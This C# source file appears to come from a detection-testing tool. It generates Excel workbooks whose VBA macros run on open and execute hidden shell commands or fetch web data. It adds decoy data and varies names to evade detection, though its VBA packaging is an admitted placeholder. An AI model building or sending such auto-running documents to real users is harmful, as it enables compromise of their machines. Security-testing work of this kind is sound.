/*
 * EXECUTION TYPE: Excel Macro
 * ID: excel-macro
 * DESCRIPTION: Generates Excel workbook (.xlsm) with VBA macros for security testing
 * CATEGORY: Document
 * FILE EXTENSION: .xlsm
 *
 * PARAMETERS:
 * @SheetCount:int:3:::Number of worksheets to create (increases polymorphism)
 * @MacroAutoRun:bool:true:::Execute macro automatically on workbook open
 * @AddDecoyData:bool:true:::Add random cell data for realism
 * @MacroName:string:Auto_Open:::Name of the VBA macro
 * @SheetName:string:Data:::Name of the main worksheet
 *
 * SUPPORTED MODULES:
 * - excel-web-query: Fetches web data via VBA
 * - excel-command-exec: Executes shell commands via VBA
 * - *: All modules marked with excel-macro execution type
 *
 * POLYMORPHIC FEATURES:
 * - Randomized sheet names based on SampleNumber
 * - Variable cell content, formulas, and colors
 * - Different VBA code styles and variable names
 * - Random number of data rows and column widths
 * - Varied macro names and comment formats
 *
 * HOW IT WORKS:
 * Takes your C# modules and converts them to VBA macro code embedded in an Excel workbook.
 * Each generated file has different characteristics for testing detection systems.
 *
 * USE CASE:
 * Test macro-based threat detection in EDR, email security, and Office security tools.
 */

using System;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Collections.Generic;
using WildfireBuffet.Core.Abstractions;
using WildfireBuffet.Core.Models;
using WildfireBuffet.Core.Helpers;
using NPOI.XSSF.UserModel;
using NPOI.SS.UserModel;
using NPOI.OpenXmlFormats.Vml;
using NPOI.OpenXmlFormats.Spreadsheet;
using ICSharpCode.SharpZipLib.Zip;

/// <summary>
/// Excel Macro execution type - generates .xlsm files with VBA macros
/// Implements polymorphic output by varying sheet names, cell data, macro names, and VBA code style
/// </summary>
public class ExcelMacro : ExecutionTypeBase
{
    // Polymorphic sheet name templates
    private static readonly string[] SheetNameTemplates = new[]
    {
        "Sheet", "Data", "Report", "Analysis", "Summary", "Details",
        "Info", "Records", "Items", "Results", "Output", "Content"
    };

    // Polymorphic macro name prefixes
    private static readonly string[] MacroNamePrefixes = new[]
    {
        "Auto_Open", "Workbook_Open", "Document_Open", "Initialize",
        "Startup", "Begin", "Load", "Run", "Execute", "Start"
    };

    // VBA comment styles for polymorphism
    private static readonly string[] VbaCommentStyles = new[]
    {
        "' {0}", "REM {0}", "'-- {0}", "' *** {0} ***", "' [{0}]"
    };

    public override ExecutionTypeDescriptor Descriptor => new()
    {
        Id = "excel-macro",
        Name = "Excel Macro (XLS/XLSM)",
        Description = "Excel workbook with VBA macros that execute module code",
        FileExtension = ".xlsm",
        Icon = "📊",
        Category = "Document",
        SupportedModules = new[] { "*" }, // Support all modules marked with excel-macro execution type
        ConfigurableParameters = new Dictionary<string, string>
        {
            { "SheetCount", "int - Number of worksheets to create" },
            { "MacroAutoRun", "bool - Execute macro on workbook open" },
            { "AddDecoyData", "bool - Add random cell data for realism" },
            { "MacroName", "string - Name of the VBA macro" },
            { "SheetName", "string - Name of the main worksheet" }
        }
    };

    public override async Task<ExecutionResult> GenerateAsync(ExecutionContext context)
    {
        // Validate module compatibility
        var validationError = ValidateModuleCompatibility(context);
        if (validationError != null)
        {
            return validationError;
        }

        // Get configuration with polymorphic defaults
        var sheetCount = GetConfig(context, "SheetCount", GetPolymorphicValue(1, 5, context.SampleNumber));
        var macroAutoRun = GetConfig(context, "MacroAutoRun", true);
        var addDecoyData = GetConfig(context, "AddDecoyData", true);
        var macroName = GetConfig(context, "MacroName", GetPolymorphicMacroName(context.SampleNumber));
        var sheetName = GetConfig(context, "SheetName", GetPolymorphicSheetName(context.SampleNumber, 0));

        try
        {
            // Generate the Excel workbook with VBA macros
            var xlsmBytes = await Task.Run(() => GenerateExcelWithMacros(
                context, sheetCount, macroAutoRun, addDecoyData, macroName, sheetName));

            var result = ExecutionResult.Succeeded(xlsmBytes);
            result.Diagnostics.Add($"Generated Excel workbook with {sheetCount} sheet(s) and VBA macros");
            result.Diagnostics.Add($"Macro Name: {macroName}, Auto-Run: {macroAutoRun}");
            result.Diagnostics.Add($"Decoy Data: {addDecoyData}, Main Sheet: {sheetName}");
            result.Diagnostics.Add($"Polymorphic Sample #{context.SampleNumber}");
            result.Diagnostics.Add($"Modules: {string.Join(", ", context.Modules.Select(m => m.Name))}");

            return result;
        }
        catch (Exception ex)
        {
            return ExecutionResult.Failed($"Excel macro generation failed: {ex.Message}\n{ex.StackTrace}");
        }
    }

    /// <summary>
    /// Override GetExecutionCode to convert C# modules to VBA code
    /// </summary>
    public override string GetExecutionCode(ExecutionContext context)
    {
        var vbaCode = new StringBuilder();

        // Use polymorphic comment style
        var commentStyle = VbaCommentStyles[context.SampleNumber % VbaCommentStyles.Length];

        vbaCode.AppendLine(string.Format(commentStyle, "Generated by Goblin King"));
        vbaCode.AppendLine(string.Format(commentStyle, $"Execution Type: Excel Macro"));
        vbaCode.AppendLine(string.Format(commentStyle, $"Timestamp: {DateTime.UtcNow:yyyy-MM-dd HH:mm:ss} UTC"));
        vbaCode.AppendLine(string.Format(commentStyle, $"Sample: {context.SampleNumber}"));
        vbaCode.AppendLine();

        // Convert each module's C# code to VBA equivalent
        foreach (var module in context.Modules)
        {
            vbaCode.AppendLine(string.Format(commentStyle, $"Module: {module.Name}"));
            vbaCode.AppendLine(ConvertCSharpToVBA(module, context));
            vbaCode.AppendLine();
        }

        return vbaCode.ToString();
    }

    private byte[] GenerateExcelWithMacros(ExecutionContext context, int sheetCount,
        bool macroAutoRun, bool addDecoyData, string macroName, string mainSheetName)
    {
        // Create new workbook
        var workbook = new XSSFWorkbook();

        // Create sheets with polymorphic names and data
        for (int i = 0; i < sheetCount; i++)
        {
            var sheet = workbook.CreateSheet(
                i == 0 ? mainSheetName : GetPolymorphicSheetName(context.SampleNumber, i));

            if (addDecoyData)
            {
                AddPolymorphicDecoyData(sheet, context.SampleNumber, i);
            }
        }

        // Generate VBA macro code
        var vbaCode = GenerateVBAMacro(context, macroName, macroAutoRun);

        // Save workbook to memory stream
        using var ms = new MemoryStream();
        workbook.Write(ms, true);
        var xlsxBytes = ms.ToArray();

        // Convert XLSX to XLSM by injecting VBA project
        var xlsmBytes = InjectVBAMacro(xlsxBytes, vbaCode, macroName);

        return xlsmBytes;
    }

    private void AddPolymorphicDecoyData(ISheet sheet, int sampleNumber, int sheetIndex)
    {
        // Use sample number and sheet index as polymorphic seed
        var seed = sampleNumber * 1000 + sheetIndex;
        var rng = new Random(seed);

        // Randomize number of rows and columns
        int rowCount = rng.Next(5, 20);
        int colCount = rng.Next(3, 8);

        // Create header row with randomized headers
        var headerRow = sheet.CreateRow(0);
        var headerStyle = sheet.Workbook.CreateCellStyle();
        var headerFont = sheet.Workbook.CreateFont();
        headerFont.IsBold = true;
        headerFont.Color = IndexedColors.White.Index;
        headerStyle.SetFont(headerFont);
        headerStyle.FillForegroundColor = IndexedColors.Blue.Index;
        headerStyle.FillPattern = FillPattern.SolidForeground;

        string[] headerNames = { "ID", "Name", "Value", "Status", "Date", "Amount", "Category", "Description" };
        for (int col = 0; col < colCount; col++)
        {
            var cell = headerRow.CreateCell(col);
            cell.SetCellValue(headerNames[col % headerNames.Length]);
            cell.CellStyle = headerStyle;

            // Randomize column width
            sheet.SetColumnWidth(col, rng.Next(3000, 8000));
        }

        // Add data rows with randomized content
        for (int rowIdx = 1; rowIdx <= rowCount; rowIdx++)
        {
            var row = sheet.CreateRow(rowIdx);

            for (int colIdx = 0; colIdx < colCount; colIdx++)
            {
                var cell = row.CreateCell(colIdx);

                // Vary cell content type based on column
                switch (colIdx % 4)
                {
                    case 0: // Numbers
                        cell.SetCellValue(rng.Next(1000, 9999));
                        break;
                    case 1: // Text
                        cell.SetCellValue($"Item{rng.Next(100, 999)}");
                        break;
                    case 2: // Formulas (some rows)
                        if (rng.Next(3) == 0 && rowIdx > 1)
                        {
                            cell.SetCellFormula($"A{rowIdx}*{rng.Next(2, 5)}");
                        }
                        else
                        {
                            cell.SetCellValue(rng.Next(100, 999));
                        }
                        break;
                    case 3: // Dates or status
                        if (rng.Next(2) == 0)
                        {
                            cell.SetCellValue(DateTime.Now.AddDays(-rng.Next(1, 365)));
                        }
                        else
                        {
                            cell.SetCellValue(new[] { "Active", "Pending", "Complete" }[rng.Next(3)]);
                        }
                        break;
                }

                // Randomly colorize some cells
                if (rng.Next(10) == 0)
                {
                    var cellStyle = sheet.Workbook.CreateCellStyle();
                    cellStyle.FillForegroundColor = (short)rng.Next(10, 20);
                    cellStyle.FillPattern = FillPattern.SolidForeground;
                    cell.CellStyle = cellStyle;
                }
            }
        }
    }

    private string GenerateVBAMacro(ExecutionContext context, string macroName, bool autoRun)
    {
        var vba = new StringBuilder();
        var commentStyle = VbaCommentStyles[context.SampleNumber % VbaCommentStyles.Length];

        vba.AppendLine("Attribute VB_Name = \"Module1\"");
        vba.AppendLine();

        // Add the macro entry point
        if (autoRun)
        {
            vba.AppendLine($"Sub {macroName}()");
        }
        else
        {
            vba.AppendLine($"Sub {macroName}()");
        }

        vba.AppendLine(string.Format(commentStyle, "Auto-generated VBA macro"));
        vba.AppendLine(string.Format(commentStyle, $"Sample #{context.SampleNumber}"));
        vba.AppendLine();

        // Add module code converted to VBA
        vba.AppendLine(GetExecutionCode(context));

        vba.AppendLine("End Sub");
        vba.AppendLine();

        // If auto-run, also add Workbook_Open event handler
        if (autoRun && macroName != "Workbook_Open")
        {
            vba.AppendLine();
            vba.AppendLine("Private Sub Workbook_Open()");
            vba.AppendLine($"    Call {macroName}");
            vba.AppendLine("End Sub");
        }

        return vba.ToString();
    }

    private string ConvertCSharpToVBA(ModuleDefinition module, ExecutionContext context)
    {
        var vba = new StringBuilder();
        var commentStyle = VbaCommentStyles[context.SampleNumber % VbaCommentStyles.Length];

        // Handle specific module types
        switch (module.Id)
        {
            case "excel-web-query":
                vba.AppendLine(ConvertWebQueryToVBA(module, context, commentStyle));
                break;

            case "excel-command-exec":
                vba.AppendLine(ConvertCommandExecToVBA(module, context, commentStyle));
                break;

            default:
                // Generic conversion for other modules
                vba.AppendLine(string.Format(commentStyle, $"Module '{module.Name}' requires manual VBA conversion"));
                vba.AppendLine(string.Format(commentStyle, "Original C# code preserved as comments:"));
                foreach (var line in module.GetSubstitutedCode().Split('\n'))
                {
                    vba.AppendLine($"' {line}");
                }
                break;
        }

        return vba.ToString();
    }

    private string ConvertWebQueryToVBA(ModuleDefinition module, ExecutionContext context, string commentStyle)
    {
        var vba = new StringBuilder();

        // Extract parameters
        var url = module.ConfiguredValues.TryGetValue("Url", out var urlObj) ? urlObj?.ToString() : "http://example.com";
        var targetSheet = module.ConfiguredValues.TryGetValue("TargetSheet", out var sheetObj) ? sheetObj?.ToString() : "Sheet1";
        var targetCell = module.ConfiguredValues.TryGetValue("TargetCell", out var cellObj) ? cellObj?.ToString() : "A1";
        var refreshInterval = module.ConfiguredValues.TryGetValue("RefreshInterval", out var intervalObj)
            ? Convert.ToInt32(intervalObj) : 0;

        // Generate polymorphic variable names
        var seed = context.SampleNumber;
        var varNames = new[] { "ws", "sheet", "target", "wks", "dataSheet" };
        var resultVars = new[] { "result", "data", "content", "response", "output" };
        var wsVar = varNames[seed % varNames.Length];
        var resultVar = resultVars[seed % resultVars.Length];

        vba.AppendLine(string.Format(commentStyle, "Web Query Module"));
        vba.AppendLine($"Dim {wsVar} As Worksheet");
        vba.AppendLine($"Dim {resultVar} As String");
        vba.AppendLine($"Set {wsVar} = ThisWorkbook.Worksheets(\"{targetSheet}\")");
        vba.AppendLine();
        vba.AppendLine(string.Format(commentStyle, $"Fetching data from {url}"));
        vba.AppendLine($"{resultVar} = FetchWebData(\"{url}\")");
        vba.AppendLine($"{wsVar}.Range(\"{targetCell}\").Value = {resultVar}");

        if (refreshInterval > 0)
        {
            vba.AppendLine(string.Format(commentStyle, $"Auto-refresh every {refreshInterval} minutes"));
        }

        return vba.ToString();
    }

    private string ConvertCommandExecToVBA(ModuleDefinition module, ExecutionContext context, string commentStyle)
    {
        var vba = new StringBuilder();

        // Extract parameters
        var command = module.ConfiguredValues.TryGetValue("Command", out var cmdObj) ? cmdObj?.ToString() : "cmd.exe";
        var windowStyle = module.ConfiguredValues.TryGetValue("WindowStyle", out var styleObj) ? styleObj?.ToString() : "Hidden";
        var wait = module.ConfiguredValues.TryGetValue("Wait", out var waitObj) && Convert.ToBoolean(waitObj);
        var captureOutput = module.ConfiguredValues.TryGetValue("CaptureOutput", out var captureObj) && Convert.ToBoolean(captureObj);

        // Generate polymorphic variable names
        var seed = context.SampleNumber;
        var shellVars = new[] { "sh", "shell", "wsh", "shellObj", "exec" };
        var resultVars = new[] { "ret", "result", "exitCode", "status", "output" };
        var shellVar = shellVars[seed % shellVars.Length];
        var resultVar = resultVars[seed % resultVars.Length];

        // Map window style to VBA constant
        var vbaWindowStyle = windowStyle.ToLower() switch
        {
            "hidden" => "0",
            "normal" => "1",
            "minimized" => "2",
            "maximized" => "3",
            _ => "0"
        };

        vba.AppendLine(string.Format(commentStyle, "Command Execution Module"));
        vba.AppendLine($"Dim {shellVar} As Object");
        vba.AppendLine($"Dim {resultVar} As Integer");
        vba.AppendLine($"Set {shellVar} = CreateObject(\"WScript.Shell\")");
        vba.AppendLine();
        vba.AppendLine(string.Format(commentStyle, $"Executing: {command}"));

        if (wait)
        {
            vba.AppendLine($"{resultVar} = {shellVar}.Run(\"{command}\", {vbaWindowStyle}, True)");

            if (captureOutput)
            {
                vba.AppendLine(string.Format(commentStyle, "Capturing output to sheet"));
                vba.AppendLine($"ThisWorkbook.Worksheets(1).Range(\"A1\").Value = \"Exit Code: \" & {resultVar}");
            }
        }
        else
        {
            vba.AppendLine($"{shellVar}.Run \"{command}\", {vbaWindowStyle}, False");
        }

        vba.AppendLine($"Set {shellVar} = Nothing");

        return vba.ToString();
    }

    private byte[] InjectVBAMacro(byte[] xlsxBytes, string vbaCode, string macroName)
    {
        // Create a memory stream for the XLSM output
        using var outputStream = new MemoryStream();

        // Copy the XLSX and add VBA project
        using (var inputStream = new MemoryStream(xlsxBytes))
        using (var zipInput = new ZipInputStream(inputStream))
        using (var zipOutput = new ZipOutputStream(outputStream))
        {
            zipOutput.SetLevel(9);

            ZipEntry entry;
            while ((entry = zipInput.GetNextEntry()) != null)
            {
                // Copy existing entries
                var newEntry = new ZipEntry(entry.Name);
                zipOutput.PutNextEntry(newEntry);

                var buffer = new byte[4096];
                int bytesRead;
                while ((bytesRead = zipInput.Read(buffer, 0, buffer.Length)) > 0)
                {
                    zipOutput.Write(buffer, 0, bytesRead);
                }
            }

            // Add VBA project parts
            AddVBAProject(zipOutput, vbaCode, macroName);

            zipOutput.Finish();
            zipOutput.Flush();
        }

        return outputStream.ToArray();
    }

    private void AddVBAProject(ZipOutputStream zip, string vbaCode, string macroName)
    {
        // Add vbaProject.bin (simplified - in production would use proper VBA binary format)
        // For now, this creates a minimal VBA structure

        // Note: NPOI doesn't fully support VBA macro injection in the binary format required by Excel
        // This is a simplified implementation that creates the structure but may need
        // Microsoft.Office.Interop.Excel or manual binary manipulation for full compatibility

        // Add xl/vbaProject.bin entry
        var vbaEntry = new ZipEntry("xl/vbaProject.bin");
        zip.PutNextEntry(vbaEntry);

        // Create minimal VBA project binary (this is a simplified placeholder)
        var vbaBytes = Encoding.UTF8.GetBytes($"VBA Project: {macroName}\n{vbaCode}");
        zip.Write(vbaBytes, 0, vbaBytes.Length);
        zip.CloseEntry();

        // Add [Content_Types].xml update for macro-enabled workbook
        var contentTypesEntry = new ZipEntry("[Content_Types].xml");
        zip.PutNextEntry(contentTypesEntry);
        var contentTypes = @"<?xml version=""1.0"" encoding=""UTF-8"" standalone=""yes""?>
<Types xmlns=""http://schemas.openxmlformats.org/package/2006/content-types"">
<Default Extension=""bin"" ContentType=""application/vnd.ms-office.vbaProject""/>
<Default Extension=""xml"" ContentType=""application/xml""/>
<Default Extension=""rels"" ContentType=""application/vnd.openxmlformats-package.relationships+xml""/>
<Override PartName=""/xl/workbook.xml"" ContentType=""application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml""/>
</Types>";
        var contentTypesBytes = Encoding.UTF8.GetBytes(contentTypes);
        zip.Write(contentTypesBytes, 0, contentTypesBytes.Length);
        zip.CloseEntry();
    }

    // Polymorphic helper methods
    private int GetPolymorphicValue(int min, int max, int seed)
    {
        var rng = new Random(seed);
        return rng.Next(min, max + 1);
    }

    private string GetPolymorphicSheetName(int sampleNumber, int index)
    {
        var template = SheetNameTemplates[(sampleNumber + index) % SheetNameTemplates.Length];
        return index == 0 ? template : $"{template}{index + 1}";
    }

    private string GetPolymorphicMacroName(int sampleNumber)
    {
        var prefix = MacroNamePrefixes[sampleNumber % MacroNamePrefixes.Length];
        return sampleNumber % 2 == 0 ? prefix : $"{prefix}_{sampleNumber % 100}";
    }
}
